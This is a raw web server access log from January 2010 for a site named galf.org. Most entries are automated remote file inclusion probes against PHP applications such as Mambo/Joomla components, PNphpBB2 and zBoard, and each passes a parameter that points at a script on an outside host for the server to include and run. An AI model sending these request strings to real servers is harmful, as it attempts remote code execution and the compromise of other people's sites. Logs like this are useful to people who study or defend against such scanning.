72.55.143.249 - - [04/Jan/2010:00:37:20 -0800] "GET /logs/access_091221.log%20%20//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://koplakirc.kilu.de/tcl/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.55.143.249 - - [04/Jan/2010:00:38:06 -0800] "GET /administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://koplakirc.kilu.de/tcl/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.55.143.249 - - [04/Jan/2010:00:38:06 -0800] "GET /logs/access_091221.log%20%20//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://koplakirc.kilu.de/tcl/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.55.143.249 - - [04/Jan/2010:00:38:06 -0800] "GET /logs//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://koplakirc.kilu.de/tcl/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
209.92.156.53 - - [04/Jan/2010:00:38:07 -0800] "GET /logs/access.log//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://koalisi.org/images/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.55.143.249 - - [04/Jan/2010:00:38:10 -0800] "GET /administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://koplakirc.kilu.de/tcl/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.55.143.249 - - [04/Jan/2010:00:38:10 -0800] "GET /logs//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://koplakirc.kilu.de/tcl/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.55.143.249 - - [04/Jan/2010:00:38:10 -0800] "GET /logs/access_091221.log%20%20//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://koplakirc.kilu.de/tcl/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.55.143.249 - - [04/Jan/2010:00:38:10 -0800] "GET /logs/access_091221.log%20%20//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://koplakirc.kilu.de/tcl/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.55.143.249 - - [04/Jan/2010:00:38:10 -0800] "GET /administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://koplakirc.kilu.de/tcl/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.55.143.249 - - [04/Jan/2010:00:38:10 -0800] "GET /logs//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://koplakirc.kilu.de/tcl/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.55.143.249 - - [04/Jan/2010:00:38:12 -0800] "GET /administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://koplakirc.kilu.de/tcl/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.55.143.249 - - [04/Jan/2010:00:38:12 -0800] "GET /logs//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://koplakirc.kilu.de/tcl/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.55.143.249 - - [04/Jan/2010:00:38:12 -0800] "GET /logs/access_091221.log%20%20//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://koplakirc.kilu.de/tcl/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.34.177.222 - - [04/Jan/2010:00:38:30 -0800] "GET /logs/access.log//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.34.177.222 - - [04/Jan/2010:00:38:31 -0800] "GET /index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.34.177.222 - - [04/Jan/2010:00:38:31 -0800] "GET /logs//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.34.177.222 - - [04/Jan/2010:00:38:33 -0800] "GET /index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.34.177.222 - - [04/Jan/2010:00:38:33 -0800] "GET /logs//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.34.177.222 - - [04/Jan/2010:00:38:33 -0800] "GET /logs/access.log%20%20//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
209.92.156.53 - - [04/Jan/2010:00:38:35 -0800] "GET /logs/access_091026.log%20%20//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://koalisi.org/images/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
209.92.156.53 - - [04/Jan/2010:00:38:35 -0800] "GET /index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://koalisi.org/images/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
209.92.156.53 - - [04/Jan/2010:00:38:35 -0800] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://koalisi.org/images/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.34.177.222 - - [04/Jan/2010:00:38:55 -0800] "GET /index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.34.177.222 - - [04/Jan/2010:00:38:55 -0800] "GET /logs//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.34.177.222 - - [04/Jan/2010:00:38:56 -0800] "GET /logs/access_091228.log//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
83.143.84.66 - - [04/Jan/2010:00:38:57 -0800] "GET /index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
83.143.84.66 - - [04/Jan/2010:00:38:57 -0800] "GET /logs//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
83.143.84.66 - - [04/Jan/2010:00:38:59 -0800] "GET /logs/access.log%20%20//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
83.143.84.66 - - [04/Jan/2010:00:39:08 -0800] "GET /logs//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
83.143.84.66 - - [04/Jan/2010:00:39:08 -0800] "GET /logs/access.log//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.galf.org"
83.143.84.66 - - [04/Jan/2010:00:39:08 -0800] "GET /index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.34.177.222 - - [04/Jan/2010:00:39:47 -0800] "GET /logs/access_091228.log%20%20//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
209.92.156.53 - - [04/Jan/2010:00:40:18 -0800] "GET /logs/access_091116.log%20%20//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://koalisi.org/images/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
83.143.84.66 - - [04/Jan/2010:00:40:30 -0800] "GET /index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
83.143.84.66 - - [04/Jan/2010:00:40:30 -0800] "GET /logs/access_091228.log//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
83.143.84.66 - - [04/Jan/2010:00:40:30 -0800] "GET /logs//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
83.143.84.66 - - [04/Jan/2010:00:40:53 -0800] "GET /logs/access_091228.log%20%20//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
61.6.163.21 - - [04/Jan/2010:00:42:12 -0800] "GET /logs/access.log HTTP/1.1" 200 232916 "-" "Mozilla/8.0" "www.galf.org"
209.92.156.53 - - [04/Jan/2010:00:42:22 -0800] "GET /logs/access.log%20%20//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://koalisi.org/images/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
209.92.156.53 - - [04/Jan/2010:00:42:22 -0800] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://koalisi.org/images/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
209.92.156.53 - - [04/Jan/2010:00:42:22 -0800] "GET /index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://koalisi.org/images/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
209.92.156.53 - - [04/Jan/2010:00:42:52 -0800] "GET /logs/access_091026.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://koalisi.org/images/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.151.247.1 - - [04/Jan/2010:00:43:09 -0800] "GET /logs/access.log//?_zb_path=http://www.nahongku.com/zBoard/skin/daerew_45galleryGD//lag.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "galf.org"
64.151.247.1 - - [04/Jan/2010:00:43:09 -0800] "GET /logs//?_zb_path=http://www.nahongku.com/zBoard/skin/daerew_45galleryGD//lag.txt??? HTTP/1.1" 200 4947 "-" "libwww-perl/5.805" "galf.org"
64.151.247.1 - - [04/Jan/2010:00:43:09 -0800] "GET /?_zb_path=http://www.nahongku.com/zBoard/skin/daerew_45galleryGD//lag.txt??? HTTP/1.1" 200 1048 "-" "libwww-perl/5.805" "galf.org"
83.170.89.6 - - [04/Jan/2010:00:44:03 -0800] "GET /logs/access.log//?_zb_path=http://www.nahongku.com/zBoard/skin/daerew_45galleryGD//lag.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
83.170.89.6 - - [04/Jan/2010:00:44:03 -0800] "GET /?_zb_path=http://www.nahongku.com/zBoard/skin/daerew_45galleryGD//lag.txt??? HTTP/1.1" 200 1048 "-" "libwww-perl/5.805" "www.galf.org"
83.170.89.6 - - [04/Jan/2010:00:44:04 -0800] "GET /logs//?_zb_path=http://www.nahongku.com/zBoard/skin/daerew_45galleryGD//lag.txt??? HTTP/1.1" 200 4947 "-" "libwww-perl/5.805" "www.galf.org"
88.212.201.94 - - [04/Jan/2010:00:45:09 -0800] "GET /?_zb_path=http://musicadelibreria.net/footer?? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "galf.org"
88.212.201.94 - - [04/Jan/2010:00:45:09 -0800] "GET /logs/?_zb_path=http://musicadelibreria.net/footer?? HTTP/1.1" 200 4942 "-" "Mozilla/5.0" "galf.org"
88.212.201.94 - - [04/Jan/2010:00:45:10 -0800] "GET /logs/access.log%20%20/?_zb_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
72.55.143.249 - - [04/Jan/2010:00:45:33 -0800] "GET /logs//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://koplakirc.kilu.de/tcl/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.55.143.249 - - [04/Jan/2010:00:45:33 -0800] "GET /administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://koplakirc.kilu.de/tcl/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.55.143.249 - - [04/Jan/2010:00:45:33 -0800] "GET /logs/access_091221.log%20%20//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://koplakirc.kilu.de/tcl/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.55.143.249 - - [04/Jan/2010:00:45:36 -0800] "GET /logs/access_091221.log%20%20//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://koplakirc.kilu.de/tcl/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.55.143.249 - - [04/Jan/2010:00:45:36 -0800] "GET /administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://koplakirc.kilu.de/tcl/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.55.143.249 - - [04/Jan/2010:00:45:36 -0800] "GET /logs//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://koplakirc.kilu.de/tcl/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
209.92.156.53 - - [04/Jan/2010:00:45:37 -0800] "GET /logs/access_090921.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://koalisi.org/images/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
88.212.201.94 - - [04/Jan/2010:00:45:53 -0800] "GET /logs/?_zb_path=http://musicadelibreria.net/footer?? HTTP/1.1" 200 4942 "-" "Mozilla/5.0" "galf.org"
88.212.201.94 - - [04/Jan/2010:00:45:53 -0800] "GET /?_zb_path=http://musicadelibreria.net/footer?? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "galf.org"
88.212.201.94 - - [04/Jan/2010:00:45:53 -0800] "GET /logs/access.log%20%20/?_zb_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
72.55.143.249 - - [04/Jan/2010:00:46:12 -0800] "GET /administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://koplakirc.kilu.de/tcl/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.55.143.249 - - [04/Jan/2010:00:46:12 -0800] "GET /logs/access_091221.log%20%20//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://koplakirc.kilu.de/tcl/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.55.143.249 - - [04/Jan/2010:00:46:12 -0800] "GET /logs//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://koplakirc.kilu.de/tcl/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
88.212.201.94 - - [04/Jan/2010:00:46:15 -0800] "GET /logs/?_zb_path=http://musicadelibreria.net/footer?? HTTP/1.1" 200 4942 "-" "Mozilla/5.0" "galf.org"
88.212.201.94 - - [04/Jan/2010:00:46:15 -0800] "GET /?_zb_path=http://musicadelibreria.net/footer?? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "galf.org"
88.212.201.94 - - [04/Jan/2010:00:46:16 -0800] "GET /logs/access.log%20%20/?_zb_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
61.47.7.71 - - [04/Jan/2010:00:48:27 -0800] "GET /logs/access_090629.log%20%20//inc/header.php/step_one.php?server_inc=http://190.12.77.105:83/fx29id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
61.47.7.71 - - [04/Jan/2010:00:48:30 -0800] "GET /logs//inc/header.php/step_one.php?server_inc=http://190.12.77.105:83/fx29id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
61.47.7.71 - - [04/Jan/2010:00:48:30 -0800] "GET /inc/header.php/step_one.php?server_inc=http://190.12.77.105:83/fx29id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
61.47.7.71 - - [04/Jan/2010:00:48:33 -0800] "GET /logs/access_090914.log%20%20//inc/header.php/step_one.php?server_inc=http://190.12.77.105:83/fx29id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
170.210.192.78 - - [04/Jan/2010:00:48:42 -0800] "GET /logs/access_091228.log//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://phoviet.vn.net//backend/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
170.210.192.78 - - [04/Jan/2010:00:48:42 -0800] "GET /index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://phoviet.vn.net//backend/id1.txt?? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.galf.org"
170.210.192.78 - - [04/Jan/2010:00:48:46 -0800] "GET /logs//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://phoviet.vn.net//backend/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
61.47.7.71 - - [04/Jan/2010:00:49:00 -0800] "GET /logs/access_090629.log%20%20//inc/header.php/step_one.php?server_inc=http://190.12.77.105:83/fx29id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
61.47.7.71 - - [04/Jan/2010:00:49:00 -0800] "GET /logs//inc/header.php/step_one.php?server_inc=http://190.12.77.105:83/fx29id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
61.47.7.71 - - [04/Jan/2010:00:49:00 -0800] "GET /inc/header.php/step_one.php?server_inc=http://190.12.77.105:83/fx29id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
61.47.7.71 - - [04/Jan/2010:00:49:11 -0800] "GET /logs/access_090914.log%20%20//inc/header.php/step_one.php?server_inc=http://190.12.77.105:83/fx29id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
61.47.7.71 - - [04/Jan/2010:00:49:44 -0800] "GET /logs/access_090629.log//inc/header.php/step_one.php?server_inc=http://190.12.77.105:83/fx29id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
61.47.7.71 - - [04/Jan/2010:00:49:44 -0800] "GET /logs/access_090914.log//inc/header.php/step_one.php?server_inc=http://190.12.77.105:83/fx29id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
61.47.7.71 - - [04/Jan/2010:00:50:15 -0800] "GET /logs/access_090629.log//inc/header.php/step_one.php?server_inc=http://190.12.77.105:83/fx29id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
61.47.7.71 - - [04/Jan/2010:00:50:15 -0800] "GET /logs/access_090914.log//inc/header.php/step_one.php?server_inc=http://190.12.77.105:83/fx29id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
170.210.192.78 - - [04/Jan/2010:00:51:22 -0800] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://qqe.ru/forum//attachments/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
170.210.192.78 - - [04/Jan/2010:00:51:22 -0800] "GET /logs/access_091123.log//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://qqe.ru/forum//attachments/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
170.210.192.78 - - [04/Jan/2010:00:51:25 -0800] "GET /index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://qqe.ru/forum//attachments/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
65.55.207.120 - - [04/Jan/2010:00:55:08 -0800] "GET /robots.txt HTTP/1.1" 404 - "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "www.galf.org"
72.55.143.249 - - [04/Jan/2010:00:57:18 -0800] "GET /classes/adodbt/sql.php?classes_dir=http://koplakirc.kilu.de/tcl/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
72.55.143.249 - - [04/Jan/2010:00:57:18 -0800] "GET /logs//classes/adodbt/sql.php?classes_dir=http://koplakirc.kilu.de/tcl/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
72.55.143.249 - - [04/Jan/2010:00:57:18 -0800] "GET /logs/access.log%20%20//classes/adodbt/sql.php?classes_dir=http://koplakirc.kilu.de/tcl/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
72.55.143.249 - - [04/Jan/2010:00:57:18 -0800] "GET /classes/adodbt/sql.php?classes_dir=http://koplakirc.kilu.de/tcl/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
72.55.143.249 - - [04/Jan/2010:00:57:18 -0800] "GET /logs/access.log%20%20//classes/adodbt/sql.php?classes_dir=http://koplakirc.kilu.de/tcl/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
72.55.143.249 - - [04/Jan/2010:00:57:18 -0800] "GET /logs//classes/adodbt/sql.php?classes_dir=http://koplakirc.kilu.de/tcl/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
72.55.143.249 - - [04/Jan/2010:00:57:23 -0800] "GET /logs//classes/adodbt/sql.php?classes_dir=http://koplakirc.kilu.de/tcl/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
72.55.143.249 - - [04/Jan/2010:00:57:23 -0800] "GET /classes/adodbt/sql.php?classes_dir=http://koplakirc.kilu.de/tcl/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
72.55.143.249 - - [04/Jan/2010:00:57:23 -0800] "GET /logs/access.log%20%20//classes/adodbt/sql.php?classes_dir=http://koplakirc.kilu.de/tcl/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
72.55.143.249 - - [04/Jan/2010:00:58:22 -0800] "GET /classes/adodbt/sql.php?classes_dir=http://koplakirc.kilu.de/tcl/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.55.143.249 - - [04/Jan/2010:00:58:22 -0800] "GET /logs//classes/adodbt/sql.php?classes_dir=http://koplakirc.kilu.de/tcl/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.55.143.249 - - [04/Jan/2010:00:58:22 -0800] "GET /logs/access_090831.log%20%20//classes/adodbt/sql.php?classes_dir=http://koplakirc.kilu.de/tcl/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.55.143.249 - - [04/Jan/2010:00:58:49 -0800] "GET /classes/adodbt/sql.php?classes_dir=http://koplakirc.kilu.de/tcl/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.55.143.249 - - [04/Jan/2010:00:58:49 -0800] "GET /logs//classes/adodbt/sql.php?classes_dir=http://koplakirc.kilu.de/tcl/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.55.143.249 - - [04/Jan/2010:00:58:49 -0800] "GET /logs/access_090831.log%20%20//classes/adodbt/sql.php?classes_dir=http://koplakirc.kilu.de/tcl/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.55.143.249 - - [04/Jan/2010:00:58:57 -0800] "GET /classes/adodbt/sql.php?classes_dir=http://koplakirc.kilu.de/tcl/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.55.143.249 - - [04/Jan/2010:00:58:57 -0800] "GET /logs//classes/adodbt/sql.php?classes_dir=http://koplakirc.kilu.de/tcl/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.55.143.249 - - [04/Jan/2010:00:58:57 -0800] "GET /logs/access_090831.log%20%20//classes/adodbt/sql.php?classes_dir=http://koplakirc.kilu.de/tcl/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
60.251.165.181 - - [04/Jan/2010:01:00:00 -0800] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://200.199.242.22/images/.ajim/ajim1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
60.251.165.181 - - [04/Jan/2010:01:00:00 -0800] "GET /logs/access_091130.log/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://200.199.242.22/images/.ajim/ajim1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
60.251.165.181 - - [04/Jan/2010:01:00:00 -0800] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://200.199.242.22/images/.ajim/ajim1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
75.127.66.135 - - [04/Jan/2010:01:00:05 -0800] "GET /logs//?base_folder=http://www.nahongku.com/zBoard/skin/daerew_45galleryGD//db91ID.txt??? HTTP/1.0" 200 4931 "-" "Mozilla/5.0" "www.galf.org"
75.127.66.135 - - [04/Jan/2010:01:00:05 -0800] "GET /logs/access_090629.log//?base_folder=http://www.nahongku.com/zBoard/skin/daerew_45galleryGD//db91ID.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
75.127.66.135 - - [04/Jan/2010:01:00:05 -0800] "GET /?base_folder=http://www.nahongku.com/zBoard/skin/daerew_45galleryGD//db91ID.txt??? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
81.2.201.96 - - [04/Jan/2010:01:00:14 -0800] "GET /?_SERVER%5BDOCUMENT_ROOT%5D=http://nextime.t35.com/Oid1.txt?? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
81.2.201.96 - - [04/Jan/2010:01:00:18 -0800] "GET /logs/access_091228.log%20%20//?_SERVER%5BDOCUMENT_ROOT%5D=http://nextime.t35.com/Oid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.19.194.26 - - [04/Jan/2010:01:01:10 -0800] "GET //?_SERVER%5BDOCUMENT_ROOT%5D=http://nextime.t35.com/Oid1.txt?? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
67.19.194.26 - - [04/Jan/2010:01:01:11 -0800] "GET /logs///?_SERVER%5BDOCUMENT_ROOT%5D=http://nextime.t35.com/Oid1.txt?? HTTP/1.1" 200 4948 "-" "Mozilla/5.0" "www.galf.org"
67.19.194.26 - - [04/Jan/2010:01:01:11 -0800] "GET /logs/access_091228.log%20%20///?_SERVER%5BDOCUMENT_ROOT%5D=http://nextime.t35.com/Oid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.19.194.26 - - [04/Jan/2010:01:01:58 -0800] "GET /logs/access_091228.log%20%20///?_SERVER%5BDOCUMENT_ROOT%5D=http://nextime.t35.com/Oid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.19.194.26 - - [04/Jan/2010:01:01:58 -0800] "GET //?_SERVER%5BDOCUMENT_ROOT%5D=http://nextime.t35.com/Oid1.txt?? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
67.19.194.26 - - [04/Jan/2010:01:01:58 -0800] "GET /logs///?_SERVER%5BDOCUMENT_ROOT%5D=http://nextime.t35.com/Oid1.txt?? HTTP/1.1" 200 4948 "-" "Mozilla/5.0" "www.galf.org"
60.251.165.181 - - [04/Jan/2010:01:02:07 -0800] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://200.199.242.22/images/.ajim/ajim1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
60.251.165.181 - - [04/Jan/2010:01:02:07 -0800] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://200.199.242.22/images/.ajim/ajim1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
